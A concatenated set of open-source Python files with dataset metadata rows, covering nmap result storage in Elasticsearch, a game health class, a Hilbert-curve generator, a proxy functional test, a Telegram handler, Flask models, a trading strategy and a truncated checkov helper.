},
{
"term": {
"is_up": True
}
},
{
"range": {
"port_count": {
"gt": 0
}
}
}
]
}
},
"sort": {
"ctime": {
"order": "desc"
}
}
})
except:
return 0, [] # search borked, return nothing
results = [] # collate results
for thing in result['hits']['hits']:
results.append(thing['_source'])
return result['hits']['total'], results
def totalHosts(self):
result = self.es.count(index="nmap", doc_type="_doc")
return result["count"]
def newhost(self, host):
if not self.status:
return
ip = str(host['ip'])
# broken in ES6
self.es.index(index='nmap_history', doc_type='_doc', body=host)
self.es.index(index='nmap', doc_type='_doc', id=ip, body=host, pipeline='geoip')
# Run host enrichment script if enabled
if os.environ.get('ENRICH_FILE_PATH'):
filename = os.environ.get('ENRICH_FILE_PATH')
proc = subprocess.Popen(["python3",filename,ip], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if err:
print("Error enriching host data | {}, ip: {}".format(filename, ip))
print("{}".format(err))
def gethost(self, ip):
if not self.status:
return 0,[]
result = self.es.search(index='nmap_history', doc_type='_doc', body={"size": 1, "query": {"query_string": {
'query': ip, "fields": ["ip"], "default_operator": "AND"}}, "sort": {"ctime": {"order": "desc"}}})
if result['hits']['total'] == 0:
return 0, None
return result['hits']['total'], result['hits']['hits'][0]['_source']
def gethost_history(self, ip, limit, offset):
if not self.status:
return 0,[]
result = self.es.search(index='nmap_history', doc_type='_doc', body={"size": limit, "from": offset, "query": {
"query_string": {'query': ip, "fields": ["ip"], "default_operator": "AND"}}, "sort": {"ctime": {"order": "desc"}}})
results = [] # collate results
for thing in result['hits']['hits']:
results.append(thing['_source'])
return result['hits']['total'], results
def gethost_scan_id(self, scan_id):
if not self.status:
return 0,[]
result = self.es.search(index='nmap_history', doc_type='_doc', body={"size": 1, "query": {
"query_string": {'query': scan_id, "fields": ["scan_id"], "default_operator": "AND"}}, "sort": {"ctime": {"order": "desc"}}})
if result['hits']['total'] == 0:
return 0, None
return result['hits']['total'], result['hits']['hits'][0]['_source']
def delete_scan(self, scan_id):
if not self.status:
return -1
migrate = False
hostResult = self.es.search(index='nmap', doc_type='_doc', body={"size": 1, "query": {
"query_string": {'query': scan_id, "fields": ["scan_id"]}}})
if hostResult['hits']['total'] != 0:
# we're deleting the most recent scan result and need to pull the next most recent into the nmap index
# otherwise you won't find the host when doing searches or browsing
ipaddr = hostResult['hits']['hits'][0]['_source']['ip']
twoscans = self.es.search(index="nmap_history", doc_type="_doc", body={"size":2, "query": {
"query_string": {"query": ipaddr, "fields": ["ip"]}}, "sort": {"ctime": {"order": "desc"}}})
if len(twoscans['hits']['hits']) != 2:
# we're deleting the only scan for this host so we don't need to migrate old scan data into the nmap index
migrate = False
else:
migrate = True
result = self.es.delete_by_query(index="nmap,nmap_history", doc_type="_doc", body={"query": {
"query_string": {"query": scan_id, "fields": ["scan_id"], "default_operator": "AND"}}})
if migrate:
self.es.index(index='nmap', doc_type='_doc', id=ipaddr, body=twoscans['hits']['hits'][1]['_source'])
return result["deleted"]
def delete_host(self, ip):
if not self.status:
return -1
deleted = self.es.delete_by_query(index="nmap,nmap_history", doc_type="_doc", body={"query": {
"query_string": {'query': ip, "fields": ["ip", "id"], "default_operator": "AND"}}, "sort": {"ctime": {"order": "desc"}}})
return deleted["deleted"]
| 46.623377
| 157
| 0.402878
|
a6edc395e28af52770d7515daa9f771577b22bf4
| 3,030
|
py
|
Python
|
HealthPoint.py
|
serin-delaunay/fleohsis
|
b4e824eb6e0ccf7aa7cb2435936656399c92553a
|
[
"MIT"
] | 1
|
2018-06-12T11:46:17.000Z
|
2018-06-12T11:46:17.000Z
|
HealthPoint.py
|
serin-delaunay/fleohsis
|
b4e824eb6e0ccf7aa7cb2435936656399c92553a
|
[
"MIT"
] | 10
|
2017-03-06T04:42:58.000Z
|
2017-03-12T20:48:42.000Z
|
HealthPoint.py
|
serin-delaunay/fleohsis
|
b4e824eb6e0ccf7aa7cb2435936656399c92553a
|
[
"MIT"
] | null | null | null |
# coding: utf-8
from typing import List, TypeVar
from obsub import event
from sortedcontainers import SortedListWithKey
from AbilityBag import AbilityBag
from Abilities import get_ability
from Ability import Ability
T = TypeVar('T', bound='HealthPoint')
class HealthPoint(object):
def __init__(self, name : str,
common_abilities : List[str],
healthy_abilities : List[str],
damaged_abilities : List[str]) -> None:
self.name = name
self._list_common_abilities = list(common_abilities)
self._list_healthy_abilities = list(healthy_abilities)
self._list_damaged_abilities = list(damaged_abilities)
self._healthy_abilities = AbilityBag(self._list_common_abilities)
self._damaged_abilities = AbilityBag(self._list_common_abilities)
self._healthy_abilities.add_abilities(self._list_healthy_abilities)
self._damaged_abilities.add_abilities(self._list_damaged_abilities)
self.description = self.make_description()
self.__is_healthy = True
def _get_health(self) -> bool:
return self.__is_healthy
def _set_health(self, health) -> None:
if self.__is_healthy != health:
self.before_health_change()
self.__is_healthy = health
self.after_health_change()
@event
def before_health_change(self): pass
@event
def after_health_change(self): pass
is_healthy = property(_get_health, _set_health)
def make_description(self) -> str:
healthy_description = '\n'.join(x.description
for x in self._healthy_abilities.abilities()
if not x.hidden)
damaged_description = '\n'.join(x.description
for x in self._damaged_abilities.abilities()
if not x.hidden)
descriptions = []
if healthy_description:
descriptions.append('Healthy:\n' + healthy_description)
if damaged_description:
descriptions.append('Damaged:\n' + damaged_description)
return '\n'.join(descriptions)
def get_abilities(self) -> AbilityBag:
if self.is_healthy:
return self._healthy_abilities
else:
return self._damaged_abilities
def copy(self : T) -> T:
return HealthPoint(self.name,
self._list_common_abilities,
self._list_healthy_abilities,
self._list_damaged_abilities)
def __repr__(self) -> str:
return "HealthPoint: {0}({1})".format(self.name,
"healthy" if self.is_healthy
else "damaged")
def summary(self) -> str:
return '[color=white]{0}({1}[color=white])'.format(
self.name,
"[color=green]healthy" if self.is_healthy
else "[color=red]damaged")
| 42.676056
| 84
| 0.605941
|
aa0236f798ad05a959d939f9e8e08144c95297e2
| 2,996
|
py
|
Python
|
Marker5/Hilbert.py
|
varsheshjp/game
|
2a47f2099aa0538301815272f749c63aa11e6ce1
|
[
"MIT"
] | null | null | null |
Marker5/Hilbert.py
|
varsheshjp/game
|
2a47f2099aa0538301815272f749c63aa11e6ce1
|
[
"MIT"
] | null | null | null |
Marker5/Hilbert.py
|
varsheshjp/game
|
2a47f2099aa0538301815272f749c63aa11e6ce1
|
[
"MIT"
] | null | null | null |
def make_mapping(m):
"""
Return a dictionary built up of a single mapping m rotated and flipped.
The keys are 2 character strings where
the first is one of [,],u,n and the second is either 'a'nticlockwise or
'c'lockwise. The values are a list of integer, tuple pair which
specify how to split up the 4 quadrants and which (shape, direction)
pair to apply to it.
The quadrants are
---------
| 0 | 1 |
---------
| 2 | 3 |
---------
"""
quads = [0, 1, 3, 2] # quadrants in clockwise order
shapes = ['u', '[', 'n', ']'] # shapes rotated clockwise
rots = ['a', 'c'] # possible rotations
def next(item, list, pos=1):
"""
Given a list and an item, reurns the item in the list
pos places after the item.
Wraps around the list at the boundaries
"""
return list[(list.index(item) + pos) % len(list)]
other_direction = lambda x: next(x, rots)
next_quadrant = lambda x: next(x, quads)
next_shape = lambda x: next(x, shapes)
def rotate(key):
rotated_value = [(next_quadrant(quad), next_shape(shape) + dirn)
for quad, (shape, dirn) in m[key]]
shape, dirn = key
return next_shape(shape) + dirn, rotated_value
def flip(key):
flipped_value = list(m[key])
flipped_value.reverse()
flipped_value = [(quad, shape+other_direction(dirn))
for quad, (shape, dirn) in flipped_value]
shape, dirn = key
return shape + other_direction(dirn), flipped_value
key = list(m.keys())[0]
while True:
key, value = rotate(key)
if key in m:
break
m[key] = value
for key in list(m.keys()):
newkey, value = flip(key)
m[newkey] = value
return m
hilbert_mapping = make_mapping(
{'ua': [(0, ']c'), (2, 'ua'), (3, 'ua'), (1, '[c')]})
arrayOfPoints=[]
def apply_mapping(ar, mapping, pos):
"""
split the 2d array ar into 4 quadrants and call
apply_mapping recursively for each member of map[pos]
If ar is 1x1, yield ar
"""
try:
y, x = ar.shape[:2]
except ValueError:
print(ar, ar.shape)
if y <= 1 and x <= 1:
yield ar[0, 0, ...]
else:
# quad indices here are:
# 0 1
# 2 3
# (nb unlike hilbert_v1!)
first_half = slice(None,int( x / 2))
secnd_half = slice(int( x / 2), None)
quads = [ar[first_half, first_half, ...],
ar[first_half, secnd_half, ...],
ar[secnd_half, first_half, ...],
ar[secnd_half, secnd_half, ...]]
for quadrant, newpos in mapping[pos]:
for x in apply_mapping(quads[quadrant], mapping, newpos):
yield x
def hilbert(ar):
for x in apply_mapping(ar, hilbert_mapping, 'ua'):
yield x
| 32.215054
| 76
| 0.535714
|
7dedab524f481d15bafbd2edd6c272f21b058669
| 8,367
|
py
|
Python
|
test/functional/feature_proxy.py
|
mmontuori/quarkcoin
|
c4da680fd4d852e3ba835d7fd23181a8f08e47db
|
[
"MIT"
] | null | null | null |
test/functional/feature_proxy.py
|
mmontuori/quarkcoin
|
c4da680fd4d852e3ba835d7fd23181a8f08e47db
|
[
"MIT"
] | 12
|
2021-05-31T22:55:50.000Z
|
2021-06-04T02:30:02.000Z
|
test/functional/feature_proxy.py
|
mmontuori/quarkcoin
|
c4da680fd4d852e3ba835d7fd23181a8f08e47db
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2015-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test monetad with different proxy configuration.
Test plan:
- Start monetad's with different proxy configurations
- Use addnode to initiate connections
- Verify that proxies are connected to, and the right connection command is given
- Proxy configurations to test on monetad side:
- `-proxy` (proxy everything)
- `-onion` (proxy just onions)
- `-proxyrandomize` Circuit randomization
- Proxy configurations to test on proxy side,
- support no authentication (other proxy)
- support no authentication + user/pass authentication (Tor)
- proxy on IPv6
- Create various proxies (as threads)
- Create monetads that connect to them
- Manipulate the monetads using addnode (onetry) an observe effects
addnode connect to IPv4
addnode connect to IPv6
addnode connect to onion
addnode connect to generic DNS name
"""
import socket
import os
from test_framework.socks5 import Socks5Configuration, Socks5Command, Socks5Server, AddressType
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
PORT_MIN,
PORT_RANGE,
assert_equal,
)
from test_framework.netutil import test_ipv6_local
RANGE_BEGIN = PORT_MIN + 2 * PORT_RANGE # Start after p2p and rpc ports
class ProxyTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 4
self.setup_clean_chain = True
def setup_nodes(self):
self.have_ipv6 = test_ipv6_local()
# Create two proxies on different ports
# ... one unauthenticated
self.conf1 = Socks5Configuration()
self.conf1.addr = ('127.0.0.1', RANGE_BEGIN + (os.getpid() % 1000))
self.conf1.unauth = True
self.conf1.auth = False
# ... one supporting authenticated and unauthenticated (Tor)
self.conf2 = Socks5Configuration()
self.conf2.addr = ('127.0.0.1', RANGE_BEGIN + 1000 + (os.getpid() % 1000))
self.conf2.unauth = True
self.conf2.auth = True
if self.have_ipv6:
# ... one on IPv6 with similar configuration
self.conf3 = Socks5Configuration()
self.conf3.af = socket.AF_INET6
self.conf3.addr = ('::1', RANGE_BEGIN + 2000 + (os.getpid() % 1000))
self.conf3.unauth = True
self.conf3.auth = True
else:
self.log.warning("Testing without local IPv6 support")
self.serv1 = Socks5Server(self.conf1)
self.serv1.start()
self.serv2 = Socks5Server(self.conf2)
self.serv2.start()
if self.have_ipv6:
self.serv3 = Socks5Server(self.conf3)
self.serv3.start()
# Note: proxies are not used to connect to local nodes
# this is because the proxy to use is based on CService.GetNetwork(), which return NET_UNROUTABLE for localhost
args = [
['-listen', '-proxy=%s:%i' % (self.conf1.addr),'-proxyrandomize=1'],
['-listen', '-proxy=%s:%i' % (self.conf1.addr),'-onion=%s:%i' % (self.conf2.addr),'-proxyrandomize=0'],
['-listen', '-proxy=%s:%i' % (self.conf2.addr),'-proxyrandomize=1'],
[]
]
if self.have_ipv6:
args[3] = ['-listen', '-proxy=[%s]:%i' % (self.conf3.addr),'-proxyrandomize=0', '-noonion']
self.add_nodes(self.num_nodes, extra_args=args)
self.start_nodes()
def node_test(self, node, proxies, auth, test_onion=True):
rv = []
# Test: outgoing IPv4 connection through node
node.addnode("15.61.23.23:1234", "onetry")
cmd = proxies[0].queue.get()
assert(isinstance(cmd, Socks5Command))
# Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, b"15.61.23.23")
assert_equal(cmd.port, 1234)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
if self.have_ipv6:
# Test: outgoing IPv6 connection through node
node.addnode("[1233:3432:2434:2343:3234:2345:6546:4534]:5443", "onetry")
cmd = proxies[1].queue.get()
assert(isinstance(cmd, Socks5Command))
# Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, b"1233:3432:2434:2343:3234:2345:6546:4534")
assert_equal(cmd.port, 5443)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
if test_onion:
# Test: outgoing onion connection through node
node.addnode("bitcoinostk4e4re.onion:9333", "onetry")
cmd = proxies[2].queue.get()
assert(isinstance(cmd, Socks5Command))
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, b"bitcoinostk4e4re.onion")
assert_equal(cmd.port, 9333)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
# Test: outgoing DNS name connection through node
node.addnode("node.noumenon:9333", "onetry")
cmd = proxies[3].queue.get()
assert(isinstance(cmd, Socks5Command))
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, b"node.noumenon")
assert_equal(cmd.port, 9333)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
return rv
def run_test(self):
# basic -proxy
self.node_test(self.nodes[0], [self.serv1, self.serv1, self.serv1, self.serv1], False)
# -proxy plus -onion
self.node_test(self.nodes[1], [self.serv1, self.serv1, self.serv2, self.serv1], False)
# -proxy plus -onion, -proxyrandomize
rv = self.node_test(self.nodes[2], [self.serv2, self.serv2, self.serv2, self.serv2], True)
# Check that credentials as used for -proxyrandomize connections are unique
credentials = set((x.username,x.password) for x in rv)
assert_equal(len(credentials), len(rv))
if self.have_ipv6:
# proxy on IPv6 localhost
self.node_test(self.nodes[3], [self.serv3, self.serv3, self.serv3, self.serv3], False, False)
def networks_dict(d):
r = {}
for x in d['networks']:
r[x['name']] = x
return r
# test RPC getnetworkinfo
n0 = networks_dict(self.nodes[0].getnetworkinfo())
for net in ['ipv4','ipv6','onion']:
assert_equal(n0[net]['proxy'], '%s:%i' % (self.conf1.addr))
assert_equal(n0[net]['proxy_randomize_credentials'], True)
assert_equal(n0['onion']['reachable'], True)
n1 = networks_dict(self.nodes[1].getnetworkinfo())
for net in ['ipv4','ipv6']:
assert_equal(n1[net]['proxy'], '%s:%i' % (self.conf1.addr))
assert_equal(n1[net]['proxy_randomize_credentials'], False)
assert_equal(n1['onion']['proxy'], '%s:%i' % (self.conf2.addr))
assert_equal(n1['onion']['proxy_randomize_credentials'], False)
assert_equal(n1['onion']['reachable'], True)
n2 = networks_dict(self.nodes[2].getnetworkinfo())
for net in ['ipv4','ipv6','onion']:
assert_equal(n2[net]['proxy'], '%s:%i' % (self.conf2.addr))
assert_equal(n2[net]['proxy_randomize_credentials'], True)
assert_equal(n2['onion']['reachable'], True)
if self.have_ipv6:
n3 = networks_dict(self.nodes[3].getnetworkinfo())
for net in ['ipv4','ipv6']:
assert_equal(n3[net]['proxy'], '[%s]:%i' % (self.conf3.addr))
assert_equal(n3[net]['proxy_randomize_credentials'], False)
assert_equal(n3['onion']['reachable'], False)
if __name__ == '__main__':
ProxyTest().main()
| 41.420792
| 121
| 0.625672
|
19f3992a92389c4c62d27316c81136da744f2ce2
| 308
|
py
|
Python
|
xoeuf/tests/test_xoeuf_api/tests/__init__.py
|
merchise-autrement/xoeuf
|
583a0faa345480e73110d467203eefd142b0a710
|
[
"BSD-3-Clause"
] | 3
|
2015-05-16T04:40:14.000Z
|
2016-01-26T05:36:20.000Z
|
xoeuf/tests/test_xoeuf_api/tests/__init__.py
|
merchise-autrement/xoeuf
|
583a0faa345480e73110d467203eefd142b0a710
|
[
"BSD-3-Clause"
] | null | null | null |
xoeuf/tests/test_xoeuf_api/tests/__init__.py
|
merchise-autrement/xoeuf
|
583a0faa345480e73110d467203eefd142b0a710
|
[
"BSD-3-Clause"
] | 1
|
2017-03-23T23:08:50.000Z
|
2017-03-23T23:08:50.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Copyright (c) Merchise Autrement [~º/~] and Contributors
# All rights reserved.
#
# This is free software; you can do what the LICENCE file allows you to.
#
from . import test_api # noqa
| 30.8
| 72
| 0.525974
|
43109446c2af035cec1dba9aa1a3b0ac72ca68f7
| 1,818
|
py
|
Python
|
strategies/Pump.py
|
igolaizola/freqtrade
|
7475ac27c81922d39d90e1234199b1cb174c1166
|
[
"MIT"
] | 15
|
2021-03-28T20:41:26.000Z
|
2021-07-20T11:20:11.000Z
|
strategies/Pump.py
|
igolaizola/freqtrade
|
7475ac27c81922d39d90e1234199b1cb174c1166
|
[
"MIT"
] | null | null | null |
strategies/Pump.py
|
igolaizola/freqtrade
|
7475ac27c81922d39d90e1234199b1cb174c1166
|
[
"MIT"
] | 5
|
2021-03-29T20:07:59.000Z
|
2022-02-22T22:10:57.000Z
|
# --- Do not remove these libs ---
from freqtrade.strategy import IStrategy, merge_informative_pair
from datetime import datetime, timedelta
from freqtrade.persistence import Trade
from pandas import DataFrame
import pandas
# --------------------------------
class Pump(IStrategy):
"""
author@: igolaizola
pumps with external buy signals using /force_buy
"""
# Minimal ROI designed for the strategy.
# adjust based on market conditions. We would recommend to keep it low for quick turn arounds
# This attribute will be overridden if the config file contains "minimal_roi"
minimal_roi = {
"0": 0.5
}
# Optimal timeframe for the strategy
timeframe = '1m'
# Optimal stoploss designed for the strategy
stoploss = -0.10
trailing_stop = True
use_custom_stoploss = True
def custom_stoploss(self, pair: str, trade: 'Trade', current_time: datetime,
current_rate: float, current_profit: float, **kwargs) -> float:
# Make sure you have the longest interval first - these conditions are evaluated from top to bottom.
if current_time - timedelta(minutes=120) > trade.open_date_utc:
return -0.02
elif current_time - timedelta(minutes=60) > trade.open_date_utc:
return -0.05
return -0.10
def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
return dataframe
def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
dataframe.loc[
(
),
'buy'] = 1
return dataframe
def populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
dataframe.loc[
(
),
'sell'] = 1
return dataframe
| 31.894737
| 108
| 0.638614
|
ceacc6af1ca867f3ffcc7847d5acabc1018b677d
| 172
|
py
|
Python
|
guitarHarmony/register.py
|
fuyuan-li/Guitar-Harmony
|
8cd836782bb19cbf39ce4a4722ea52d7988b2cc4
|
[
"MIT"
] | 5
|
2020-03-15T19:09:59.000Z
|
2021-02-26T03:32:38.000Z
|
guitarHarmony/register.py
|
fuyuan-li/Guitar-Harmony
|
8cd836782bb19cbf39ce4a4722ea52d7988b2cc4
|
[
"MIT"
] | 1
|
2020-03-30T06:46:17.000Z
|
2020-03-30T06:46:17.000Z
|
guitarHarmony/register.py
|
fuyuan-li/Guitar-Harmony
|
8cd836782bb19cbf39ce4a4722ea52d7988b2cc4
|
[
"MIT"
] | 1
|
2020-03-30T05:59:24.000Z
|
2020-03-30T05:59:24.000Z
|
# -*- coding: utf-8 -*-
# @Author: Xi He
# @Date: 2020-03-21 12:34:40
# @Last Modified by: Xi He
# @Last Modified time: 2020-03-21 12:36:06
from .helper import CONSTANT
| 28.666667
| 42
| 0.639535
|
0d24368ac235cc6c012368ffd0a757711cec3ceb
| 712
|
py
|
Python
|
dkeras/config/process_config.py
|
gndctrl2mjrtm/dkeras
|
97bcf176dbc96bd52cc6e19283159a6e73f0a4dc
|
[
"MIT"
] | 195
|
2019-09-05T08:41:53.000Z
|
2022-03-09T14:04:07.000Z
|
dkeras/config/process_config.py
|
gndctrl2mjrtm/dkeras
|
97bcf176dbc96bd52cc6e19283159a6e73f0a4dc
|
[
"MIT"
] | 4
|
2019-11-27T00:45:31.000Z
|
2020-03-11T14:12:44.000Z
|
dkeras/config/process_config.py
|
gndctrl2mjrtm/dkeras
|
97bcf176dbc96bd52cc6e19283159a6e73f0a4dc
|
[
"MIT"
] | 14
|
2019-11-27T17:32:36.000Z
|
2022-02-12T03:55:15.000Z
|
#!/bin/env/python
# -*- encoding: utf-8 -*-
"""
"""
from __future__ import print_function, division
import dkeras.config.config as config
type_dict = {
'CPU_OVERLOAD_LIMIT': float,
'N_CPUS_PER_SERVER': int,
'N_CPUS_PER_WORKER': int
}
def verify_types():
"""
:return: None
"""
local_vars = list(locals().keys())
config_vars = dir(config)
for v_name in type_dict.keys():
var = config.__dict__[v_name]
if not isinstance(var, type_dict[v_name]):
raise TypeError(
"Config variable should be type: {}, not type: {}".format(
type_dict[v], type(var).__name__))
if __name__ == "__main__":
verify_types()
| 20.342857
| 74
| 0.599719
|
43a7e5b1d304bab2f4e750abab66ec03ecf1d69d
| 4,344
|
py
|
Python
|
venv/lib/python3.7/site-packages/telegram/ext/choseninlineresulthandler.py
|
danigfavero/ada
|
3c3842023c22510eedf207b23c418f22389622aa
|
[
"MIT"
] | 1
|
2021-08-20T05:43:20.000Z
|
2021-08-20T05:43:20.000Z
|
venv/lib/python3.6/site-packages/telegram/ext/choseninlineresulthandler.py
|
assaufianggie/VerraBot
|
cbe46ccb219c2972871e760268b427e1f8e79f93
|
[
"MIT"
] | 5
|
2021-03-31T19:34:39.000Z
|
2021-12-13T20:29:07.000Z
|
venv/lib/python3.6/site-packages/telegram/ext/choseninlineresulthandler.py
|
assaufianggie/VerraBot
|
cbe46ccb219c2972871e760268b427e1f8e79f93
|
[
"MIT"
] | 1
|
2020-09-02T07:24:59.000Z
|
2020-09-02T07:24:59.000Z
|
#!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2018
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
"""This module contains the ChosenInlineResultHandler class."""
from telegram import Update
from .handler import Handler
class ChosenInlineResultHandler(Handler):
"""Handler class to handle Telegram updates that contain a chosen inline result.
Attributes:
callback (:obj:`callable`): The callback function for this handler.
pass_update_queue (:obj:`bool`): Determines whether ``update_queue`` will be
passed to the callback function.
pass_job_queue (:obj:`bool`): Determines whether ``job_queue`` will be passed to
the callback function.
pass_user_data (:obj:`bool`): Determines whether ``user_data`` will be passed to
the callback function.
pass_chat_data (:obj:`bool`): Determines whether ``chat_data`` will be passed to
the callback function.
Note:
:attr:`pass_user_data` and :attr:`pass_chat_data` determine whether a ``dict`` you
can use to keep any data in will be sent to the :attr:`callback` function. Related to
either the user or the chat that the update was sent in. For each update from the same user
or in the same chat, it will be the same ``dict``.
Note that this is DEPRECATED, and you should use context based callbacks. See
https://git.io/fxJuV for more info.
Args:
callback (:obj:`callable`): The callback function for this handler. Will be called when
:attr:`check_update` has determined that an update should be processed by this handler.
Callback signature for context based API:
``def callback(update: Update, context: CallbackContext)``
The return value of the callback is usually ignored except for the special case of
:class:`telegram.ext.ConversationHandler`.
pass_update_queue (:obj:`bool`, optional): If set to ``True``, a keyword argument called
``update_queue`` will be passed to the callback function. It will be the ``Queue``
instance used by the :class:`telegram.ext.Updater` and :class:`telegram.ext.Dispatcher`
that contains new updates which can be used to insert updates. Default is ``False``.
DEPRECATED: Please switch to context based callbacks.
pass_job_queue (:obj:`bool`, optional): If set to ``True``, a keyword argument called
``job_queue`` will be passed to the callback function. It will be a
:class:`telegram.ext.JobQueue` instance created by the :class:`telegram.ext.Updater`
which can be used to schedule new jobs. Default is ``False``.
DEPRECATED: Please switch to context based callbacks.
pass_user_data (:obj:`bool`, optional): If set to ``True``, a keyword argument called
``user_data`` will be passed to the callback function. Default is ``False``.
DEPRECATED: Please switch to context based callbacks.
pass_chat_data (:obj:`bool`, optional): If set to ``True``, a keyword argument called
``chat_data`` will be passed to the callback function. Default is ``False``.
DEPRECATED: Please switch to context based callbacks.
"""
def check_update(self, update):
"""Determines whether an update should be passed to this handlers :attr:`callback`.
Args:
update (:class:`telegram.Update`): Incoming telegram update.
Returns:
:obj:`bool`
"""
return isinstance(update, Update) and update.chosen_inline_result
| 49.931034
| 99
| 0.683702
|
a6d3574085f276b565fe3d9b7dfcec63e52b2ab7
| 1,662
|
py
|
Python
|
flaskblog/models.py
|
oecorrechag/ProyectoM
|
e21acfc44c566e9030b2931c7b450da9bcc1b19d
|
[
"MIT"
] | null | null | null |
flaskblog/models.py
|
oecorrechag/ProyectoM
|
e21acfc44c566e9030b2931c7b450da9bcc1b19d
|
[
"MIT"
] | null | null | null |
flaskblog/models.py
|
oecorrechag/ProyectoM
|
e21acfc44c566e9030b2931c7b450da9bcc1b19d
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from flask import current_app
from flaskblog import db, login_manager
from flask_login import UserMixin
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class User(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(20), unique=True, nullable=False)
email = db.Column(db.String(120), unique=True, nullable=False)
image_file = db.Column(db.String(20), nullable=False, default='default.jpg')
password = db.Column(db.String(60), nullable=False)
posts = db.relationship('Post', backref='author', lazy=True)
def get_reset_token(self, expires_sec=1800):
s = Serializer(app.config['SECRET_KEY'], expires_sec)
return s.dumps({'user_id': self.id}).decode('utf-8')
@staticmethod
def verify_reset_token(token):
s = Serializer(app.config['SECRET_KEY'])
try:
user_id = s.loads(token)['user_id']
except:
return None
return User.query.get(user_id)
def __repr__(self):
return f"User('{self.username}', '{self.email}', '{self.image_file}')"
class Post(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(100), nullable=False)
date_posted = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
content = db.Column(db.Text, nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
def __repr__(self):
return f"Post('{self.title}', '{self.date_posted}')"
| 35.361702
| 81
| 0.690734
|
3f02ff84a26d33492b748b602335c14e59efc7ee
| 5,753
|
py
|
Python
|
checkov/common/util/docs_generator.py
|
jamesholland-uk/checkov
|
d73fd4bd7096d48ab3434a92a177bcc55605460a
|
[
"Apache-2.0"
] | null | null | null |
checkov/common/util/docs_generator.py
|
jamesholland-uk/checkov
|
d73fd4bd7096d48ab3434a92a177bcc55605460a
|
[
"Apache-2.0"
] | null | null | null |
checkov/common/util/docs_generator.py
|
jamesholland-uk/checkov
|
d73fd4bd7096d48ab3434a92a177bcc55605460a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import re
from typing import List, Optional, Tuple, Union
from tabulate import tabulate
from checkov.arm.registry import arm_resource_registry, arm_parameter_registry
from checkov.bicep.checks.param.registry import registry as bicep_param_registry
from checkov.bicep.checks.resource.registry import registry as bicep_resource_registry
from checkov.bitbucket.registry import registry as bitbucket_configuration_registry
from checkov.cloudformation.checks.resource.registry import cfn_registry as cfn_registry
from checkov.common.checks.base_check_registry import BaseCheckRegistry
from checkov.common.checks_infra.registry import BaseRegistry as BaseGraphRegistry, get_graph_checks_registry
from checkov.dockerfile.registry import registry as dockerfile_registry
from checkov.github.registry import registry as github_configuration_registry
from checkov.github_actions.checks.job_registry import registry as github_actions_jobs_registry
from checkov.gitlab.registry import registry as gitlab_configuration_registry
from checkov.kubernetes.checks.resource.registry import registry as k8_registry
from checkov.secrets.runner import CHECK_ID_TO_SECRET_TYPE
from checkov.serverless.registry import sls_registry
from checkov.terraform.checks.data.registry import data_registry
from checkov.terraform.checks.module.registry import module_registry
from checkov.terraform.checks.provider.registry import provider_registry
from checkov.terraform.checks.resource.registry import resource_registry
ID_PARTS_PATTERN = re.compile(r'([^_]*)_([^_]*)_(\d+)')
def get_compare_key(c):
res = []
for match in ID_PARTS_PATTERN.finditer(c[0]):
ckv, framework, number = match.groups()
numeric_value = int(number) if number else 0
# count number of leading zeros
same_number_ordering = len(number) - len(number.lstrip('0'))
res.append((framework, ckv, numeric_value, same_number_ordering, c[2]))
return res
def print_checks(frameworks: Optional[List[str]] = None, use_bc_ids: bool = False) -> None:
framework_list = frameworks if frameworks else ["all"]
printable_checks_list = get_checks(framework_list, use_bc_ids=use_bc_ids)
print(
tabulate(printable_checks_list, headers=["Id", "Type", "Entity", "Policy", "IaC"], tablefmt="github",
showindex=True))
print("\n\n---\n\n")
def get_checks(frameworks: Optional[List[str]] = None, use_bc_ids: bool = False) -> \
List[Tuple[str, str, str, str, str]]:
framework_list = frameworks if frameworks else ["all"]
printable_checks_list = []
def add_from_repository(registry: Union[BaseCheckRegistry, BaseGraphRegistry], checked_type: str, iac: str) -> None:
nonlocal printable_checks_list
if isinstance(registry, BaseCheckRegistry):
for entity, check in registry.all_checks():
